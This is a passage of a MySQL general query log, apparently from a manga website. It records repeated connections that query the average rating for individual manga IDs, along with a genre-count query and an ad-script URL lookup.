FROM ratings where manga_id = '257' order by created desc 330649306 Quit 330649307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330649307 Quit 330649308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330649308 Quit 330649309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330649309 Quit 330649310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330649310 Quit 330649311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330649311 Quit 330649312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330649312 Quit 330649313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330649313 Quit 330649314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330649314 Quit 330649315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330649315 Quit 330649316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330649316 Quit 330649317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330649317 Quit 330649318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330649318 Quit 330649319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330649319 Quit 330649320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330649320 Quit 330649321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330649321 Quit 330649322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330649322 Quit 330649323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330649323 Quit 330649324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330649324 Quit 330649325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330649325 Quit 330649326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330649326 Quit 330649327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330649327 Quit 330649328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330649328 Quit 330649329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330649329 Quit 330649330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330649330 Quit 330649331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330649331 Quit 330649332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330649332 Quit 330649333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330649333 Quit 330649334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330649334 Quit 330649335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330649335 Quit 330649336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330649336 Quit 330649337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330649337 Quit 330649338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330649338 Quit 330649339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330649339 Quit 330649340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330649340 Quit 330649341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330649341 Quit 330649342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330649342 Quit 330649343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330649343 Quit 330649344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330649344 Quit 330649345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330649345 Quit 330649346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330649346 Quit 330649347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330649347 Quit 330649348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330649348 Quit 330649349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330649349 Quit 330649350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330649350 Quit 330649351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330649351 Quit 330649352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330649352 Quit 330649353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330649353 Quit 330649354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330649354 Quit 330649355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330649355 Quit 330649356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330649356 Quit 330649357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330649357 Quit 330649358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330649358 Quit 330649359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330649359 Quit 330649360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330649360 Quit 330649361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330649361 Quit 330649362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330649362 Quit 330649363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330649363 Quit 330649364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330649364 Quit 330649365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330649365 Quit 330649366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330649366 Quit 330649367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330649367 Quit 330649368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330649368 Quit 330649369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330649369 Quit 330649370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330649370 Quit 330649371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330649371 Quit 330649372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330649372 Quit 330649373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330649373 Quit 330649374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330649374 Quit 330649375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330649375 Quit 330649376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330649376 Quit 330649377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330649377 Quit 330649378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330649378 Quit 330649379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330649379 Quit 330649380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330649380 Quit 330649381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330649381 Quit 330649382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330649382 Quit 330649383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330649383 Quit 330649384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330649384 Quit 330649385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330649385 Quit 330649386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330649386 Quit 330649387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330649387 Quit 330649388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330649388 Quit 330649389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330649389 Quit 330649390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330649390 Quit 330649391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330649391 Quit 330649392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330649392 Quit 330649393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330649393 Quit 330649394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330649394 Quit 330649395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330649395 Quit 330649396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330649396 Quit 330649397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330649397 Quit 330649398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330649398 Quit 330649399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330649399 Quit 330649400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330649400 Quit 330649401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330649401 Quit 330649402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330649402 Quit 330649403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330649403 Quit 330649404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330649404 Quit 330649405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330649405 Quit 330649406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330649406 Quit 330649407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330649407 Quit 330649408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330649408 Quit 330649409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330649409 Quit 330649410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330649410 Quit 330649411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330649411 Quit 330649412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330649412 Quit 330649413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330649413 Quit 330649414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330649414 Quit 330649415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330649415 Quit 330649416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330649416 Quit 330649417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330649417 Quit 330649418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330649418 Quit 330649419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330649419 Quit 330649420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330649420 Quit 330649421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330649421 Quit 330649422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330649422 Quit 330649423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330649423 Quit 330649424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330649424 Quit 330649425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330649425 Quit 330649426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330649426 Quit 330649427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330649427 Quit 330649428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330649428 Quit 330649429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330649429 Quit 330649430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330649430 Quit 330649431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330649431 Quit 330649432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330649432 Quit 330649433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330649433 Quit 330649434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330649434 Quit 330649435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330649435 Quit 330649436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330649436 Quit 330649437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330649437 Quit 330649438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330649438 Quit 330649439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330649439 Quit 330649440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330649440 Quit 330649441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330649441 Quit 330648659 Quit 330649442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330649443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649442 Quit 330649444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330649443 Quit 330649444 Quit 330649445 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330649445 Quit 330649446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330649446 Quit 330649447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330649447 Quit 330649448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330649448 Quit 330649449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330649449 Quit 330649450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330649450 Quit 330649451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330649451 Quit 330649452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330649452 Quit 330649453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330649453 Quit 330649454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330649454 Quit 330649455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330649457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649456 Quit 330649455 Quit 330649457 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649457 Quit 330649458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330649458 Quit 330649460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649461 Connect 